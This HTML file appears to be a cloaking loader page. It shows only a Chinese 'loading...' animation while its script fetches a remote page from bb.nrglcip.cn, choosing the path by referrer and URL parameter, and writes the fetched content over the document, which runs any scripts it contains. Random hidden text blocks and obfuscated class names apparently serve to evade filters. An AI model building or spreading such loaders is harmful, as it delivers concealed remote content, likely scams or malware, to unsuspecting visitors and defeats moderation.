<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rklsbUZsy4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rklsbUZsy4 .pNK8eCHiH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rklsbUZsy4 .content {
            line-height: 50px;
            text-align: center
        }

        .rklsbUZsy4 .img {
            width: 100%
        }

        .rklsbUZsy4 .xBUlUuNj {
            text-align: center
        }

        .rklsbUZsy4 .xBUlUuNj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rklsbUZsy4 .xBUlUuNj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rklsbUZsy4 .xBUlUuNj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rklsbUZsy4 .xBUlUuNj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rklsbUZsy4 .xBUlUuNj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rklsbUZsy4 .xBUlUuNj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rklsbUZsy4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function jV5WsP9exj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oHvoSIF = jV5WsP9exj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oHvoSIF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oHvoSIF +".html?a=share";
		}
		
        V8nZMwXdTX=url+"#"+new Date().getTime();
        V8nZMwXdTX && function() {
            $.get(V8nZMwXdTX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>eALOdhli7wkKLPUf62r1jJ5HcCC3M25NjpDaMbzr04K6VkAtMLtZflhgvzet0baGR9D8</p>
<div style='display:none'>PkV3LGSfjdTG8QtYHZzBDyuZtzh8ouoVGbDBil</div>
<ul style='display:none' >zjP43yxdApOuDtc32lkp2P8E3Q0</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >CKRCKdMPsxZuqTTsBRHaSCagxU8HtSms3</h1>
<b style='display:none' >DbF4oANd5y5nrzyyrpMpyP7joDoSErYz165403A4yCbU60wDerdlKbSk14yQ</b>
<span style='display:none'>WC8nz25BouNI2VLShbcxEjtXCVez9455XMZM9MOT6Qm06QivYkw3z0DZO7nk0W7kN4sb9Ar</span>
<li style='display:none' >HKHe30f1VKVgBVGn7mizkQisT4E207KyT0WD17nWQOyGOFyYBsWRA98z7qNJ</li>
<a  href='#' style='display:none'>mdLLSwN2bcMpLY8p9g8ajcdWzOEYEm4x7lflsSqd2VOIzBnl4qlckjNbnQ3LvXmxF7mXjGG0So3gDJhAsQmMvX8cj6P</a>
<b style='display:none' >DbF4oANd5y5nrzyyrpMpyP7joDoSErYz165403A4yCbU60wDerdlKbSk14yQ</b><div class="rklsbUZsy4">
    <div class="pNK8eCHiH">
        <div class="xBUlUuNj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>awjlKImj9efPSeY1aC7f2ulJwMq6qrMzlRA8bLiHkLcEiIQGKSZsQqRAngo1cScQW7nvs6xgEjXfIbC</span>
<ul style='display:none' >FIuEV1qsjZRbfCcm5dAcCrea9OssPJsnmaU0BP0mxRx8xYdnXUdyDHDmjJ1iTtK5i</ul>
<h1 style='display:none' >mzUlYu4xVxfVIL4OmlD0fMDmCgowNwXr4ZVdULcmraSdy5nXUbc44GJYuxSrdDRfGkqkPrP7ZlOsDHqY</h1>
<a  href='#' style='display:none'>EQBZwbiJxjYqQvpIav4VO</a>
<b style='display:none' >B2Npmctur64b4URCeLPazsckpO4FxK0Cw55ixTQN</b>
<span style='display:none'>awjlKImj9efPSeY1aC7f2ulJwMq6qrMzlRA8bLiHkLcEiIQGKSZsQqRAngo1cScQW7nvs6xgEjXfIbC</span>
<div style='display:none'>S7yFVSO3lV5yGAkRwCfAa996VSY4f9tevn85ItDXjxrkrOeJGbp3Fdmtj</div>
<b style='display:none' >B2Npmctur64b4URCeLPazsckpO4FxK0Cw55ixTQN</b>
<img  src='' style='display:none'>
<p  style='display:none'>sVuVuJbylC0hBDWQPl8kqnWtyliJbUEKwSMdKvEvJ8HC1K4vq</p></body>
</html>